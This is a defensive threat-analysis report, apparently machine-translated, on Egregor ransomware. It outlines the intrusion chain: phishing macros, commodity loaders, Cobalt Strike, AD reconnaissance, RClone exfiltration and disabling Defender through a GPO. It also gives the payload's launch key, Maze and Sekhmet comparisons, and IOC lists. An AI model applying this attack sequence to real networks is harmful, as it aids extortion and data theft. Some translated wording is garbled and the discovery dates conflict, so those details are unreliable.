egregor ransomware

About Egregor Ransomware

is a variant of ransomware that was first discovered in September 2020 . Recently, several subtle attacks have been identified that target companies around the world, such as gaming giants Crytek and Ubisoft .

Similar to blackmail-type Maze ransomware, attacks steal target data, store it on a remote server, and then encrypt the data on the user’s machine. Egregor is probably the most aggressive type of ransomware family in terms of negotiations with victims.

The attacker gives only 72 hours to respond to the victim. If the ransom is not paid, the data will be published on the attacker’s website, News.

Ransom payments are negotiated and agreed through a dedicated chat feature provided for each victim. Ransom payments are made in Bitcoin.

clip_image001
Data published on the website “Egregor News”

Egregor is believed to be a companion to another ransomware called Sekhmet, which appeared in March 2020. Sekhmet has many similarities with Egregor, and some with Maze.

Egregor is still quite a mystery in terms of how the attacks are delivered and behind the scenes, and no detailed information is available at this time, but speculation is that Maze announced its suspension in late October. It is also said to be the “successor”. This assumption is based on the closeness between the two and, of course, the timing of the shift.

Main survey results

· New Threat : Egregor ransomware has caused great damage in a short period of time and has smashed news headlines around the world.

· High Severity : Cybereason’s Nocturnus team rates Egregor’s threat level as “high” because of the destructive power of its attacks.

· Slow infiltration: Before deploying ransomware, attackers infiltrate the organization and move it laterally before attempting a full-fledged hacking operation.

· Transmission route through commodity malware : Commodity malware seems to be the source of infection. Based on preliminary reconnaissance of the stolen data sent to the C2 server, it escalate the attack into an interactive hacking operation, eventually causing a large number of ransomware infections.

· Detection and Defense : The Cybereason Defense Platform fully detects and defends against Egregor ransomware.

EGREGOR attack flow

clip_image002
Egregor infection chain

From Commodity Malware Infection to Ransomware

Since Egregor is a relatively recent malware, this report does not provide much of an Egregor-related incident, including information about the infection chain, and does not provide a detailed explanation.

The information obtained so far suggests that the first infection begins with a phishing email with a file with malicious macro code embedded in it.

The macro code downloads either the Qbot iced ID or Ursnif commodity malware. This technique of using commodity malware for initial infection and ultimately delivering ransomware has been previously observed in Ryuk ransomware and Maze.

Later in the attack, when the Cobalt Strike beacon is installed on the infected machine, the attack transitions to an interactive hacking activity. Attackers use reconnaissance tools such as Adfind and Sharphound to gather information about users, groups, computers, and more. This information is also used during the horizontal deployment stage to allow Egregor to exploit Active Directory to elevate privileges in order to become a domain administrator.

At this stage, when the malware is installed on the victim’s machine, it begins communicating with the C2 server, eventually including scripts, DLLs, and other files used to leak data and encrypt files. Additional components will be downloaded.

The files to be imported include the following.

· Batch file : Used to run Bitsadmin and Rundll to download and run the Egregor payload.

· Zip file : Contains a binary file called RClone client (renamed svchost) and RClone configuration files (webdav, ftp, dropbox) that will be used later for data extraction.

clip_image003
VT screenshot of RClone executable and config file

CobaltStrike creates a service that executes encrypted PowerShell commands and executes shellcode that creates a connection to amazjai-technologies [.] Industry.

clip_image004
Shellcode decryption

After ingesting the files needed for the attack, the attacker “prepares” and takes the final steps to detection and defense by security features.

Create a Group Policy Object (GPO) to disable Windows Defender and try to disable any antivirus product.

Run EGREGOR

As mentioned earlier, an Egregor attacker deploys a ransomware payload after collecting sensitive information and configures a GPO to detection and protection by security features. To deploy the ransomware, as mentioned above, run the ingested batch file and use it to download and run the ransomware payload from a remote server.

clip_image005
Contents of batch file

The Egregor payload can only be decrypted if the correct key is provided in the command line arguments to the Rundll32 process. Therefore, the file cannot be analyzed either manually or using a sandbox unless the exact same command line that the attacker used to run the ransomware is provided.

In order to execute the ransomware and decrypt the blobs of the code in it, the attacker provides the batch file with a “-passegregor 10” key that resolves by executing the ransomware and encrypting the file.

clip_image006
Executing a batch file represented by Cybereason Defense Platform

The encrypted file name will have a random string added as a new extension. For example, the file name “My_files.zip” will be changed to “My_files.zip.IAsnM” and “My_files2.zip” will be changed to “My_files2.zip.WZlF”. The attacker also creates “recover-files.txt” with ransom notes in all the folders that store the encrypted files, as shown below.

clip_image007
Encrypted file

clip_image008
Message to user

What SEKHMET and MAZE have in common

Egregor is similar in code to the infamous Maze and Sekhmet ransomware. In addition to code similarities, tree-type ransomware has a lot in common in terms of behavior and features.

Maze Sekhmet Egregor
First discovery May 2019 March 2020 July 2020
File type DLL/EXE ETC ETC
Encrypted file extension An extension consisting of random characters is randomly added to the file name. An extension consisting of random characters is randomly added to the file name. An extension consisting of random characters is randomly added to the file name.
Cryptographic algorithm ChaCha and RSA ChaCha and RSA ChaCha and RSA
File name of the ransom request message DECRYPT-FILES.txt RECOVER-FILES.txt RECOVER-FILES.txt
Be killed Encryption and blackmail Encryption and blackmail Encryption and blackmail
Cybercrime contact Tor browser website Tor browser website Tor browser website
Website Maze News Leaks, Leaks, Leaks Egregor News

Another way to look for commonalities between the three malwares is to look at the infrastructure. There are various binaries, Zip files, and scripts with IP address 185.238.0 [.] 233.

· Maze ransomware binaries

· Egregor ransomware binaries

· Zip file contains RClone binaries and configuration file

The IP address is referenced by various scripts, such as a batch file that downloads the Egregor payload.

clip_image009
185.238.0 […] Chart showing various samples found in 233

Also noteworthy are the similarities between the three ransom notes. They have a very similar structure, with some being “copy-pasted”.

clip_image010
Comparison of ransom notes for three ransomware

Not only the Maze and Egregor binaries were found on this particular server. Other samples related to Prolock ransomware have also been found on the server, as analyzed in this report .

IOCs

45.153.242.129
185.238.0.233
49.12.104.241

765327e1dc0888c69c92203d90037c5154db9787f54d3fc8f1097830be8c76ab
4139c96d16875d1c3d12c27086775437b26d3c0ebdcdc258fb012d23b9ef8345
af538ab1b8bdfbf5b7f1548d72c0d042eb14d0011d796cab266f0671720abb4d
6675c204844476dd8ce59ead0eac082754ded599036551526a8e2c509a1407e4
004a2dc3ec7b98fa7fe6ae9c23a8b051ec30bcfcd2bc387c440c07ff5180fe9a
42ac07c5175d88d6528cfe3dceacd01834323f10c4af98b1a190d5af7a7bb1cb
7caed5f406445c788543f55af6d98a8bc4f0c104e6a51e2564dd37b6a485cc18
c1c4e677b36a2ee6ae858546e727e73cc38c95c9024c724f939178b3c03de906
2d563dd113a02fdf452544ae2fd7c94162be6db8fb7a287a3474a6ab998159fd
a5989c480ec6506247325652a1f3cb415934675de3877270ae0f65edd9b14d13
6a441734b34cdee31a01164140b0c88966fbb4358dcb63a14ae6824f09e9476f
14e547bebaa738b8605ba4182c4379317d121e268f846c0ed3da171375e65fe4
f0adfd3f89c9268953f93bfdfefb84432532a1e30542fee7bddda14dcb69a76c
444a6897058fd4965770167b15a2ab13e6fd559a3e6f6cf5565d4d3282587459
1c2b3fff557791d255987234249a453237aa2522634828ab503c87c383e49d86
830d274a1cbeebe34b0997d5c84c6028a0c72e74762f770f2240d12c1c4ba3a5
21960f49f296623f1ca6bc15ca8117f57774db97fd910855f75f15364879cfda
885f0566e978ab36cd3f33995fb16ec3e31535b2de4c651a1bc7a3172ae7dc60
0a599e58fb4949fe21c182523178bc479f22ffd57cd582417bf62172a0be348a

f7bf7cea89c6205d78fa42d735d81c1e5c183041
5a346fb957abeba389424dc57636edcacc58b5ba
901cee60fba225baf80c976b10dfa1684a73f5ee
a6259615ea10c30421e83d20f4a4b5f2c41b45b8
03cdec4a0a63a016d0767650cdaf1d4d24669795
4ea064f715c2a5f4ed68f57029befd8f406671dd
ac634854448eb8fcd3abf49c8f37cd21f4282dde
7bc6c2d714e88659b26b6b8ed6681b1f91eef6af
0579da0b8bfdfce7ca4a45baf9df7ec23989e28b
3a33de9a84bbc76161895178e3d13bcd28f7d8fe
986f69a43e0bf174f73139785ec8f969acf5aa55
f1603f1ddf52391b16ee9e73e68f5dd405ab06b0
ac6d919b313bbb18624d26745121fca3e4ae0fd3
95aea6b24ed28c6ad13ec8d7a6f62652b039765e
a786f383dfb90191aa2ca86ade68ee3e7c088f82
1be22505a25f14fff1e116fafcaae9452be325b1
a2d5700def24c3ae4d41c679e83d93513259ae4a
34a466a0e55a930d8d7ecd1d6e6c9c750082a5fe
2edaa3dd846b7b73f18fa638f3e1bc3a956affa4

0de24cec66ef9d1042be7cf12b87cfc4
7087c55287578a3660cd86435241e59a
b196bc4d3bea5b7922b98d9ba9eb8e2b
d16a62fa072bbbf84aee0be82e6850a3
5f9fcbdf7ad86583eb2bbcaa5741d88a
1a65aae1076d8026bde8e576adcdadd2
b554791b5b161c34b0a7d26e34a88e60
1cce0c0d67fe7f51f335a12138698403
3c18331989cb006506338ed1f838430d
520ee511034717f5499fb66f9c0b76a5
685a38092179c2e5602c06faba7287e6
d1aa0f26f557addd45e0d9fa4afecf15
7375083934dd17f0532da3bd6770ab25
8ba3a9d73903bd252f8d99a682d60858
32fe2886f2c9302b3fb12a964a07c7ec
2a7fd15ebe1a1ac21e5f2aa889f26e46
bcdb9b0346f803c6a2c7d13db9105c24
4935bb1e2208b6df924e39797ab69bf8
edaa31c37af0b72f7c1d747969f3facf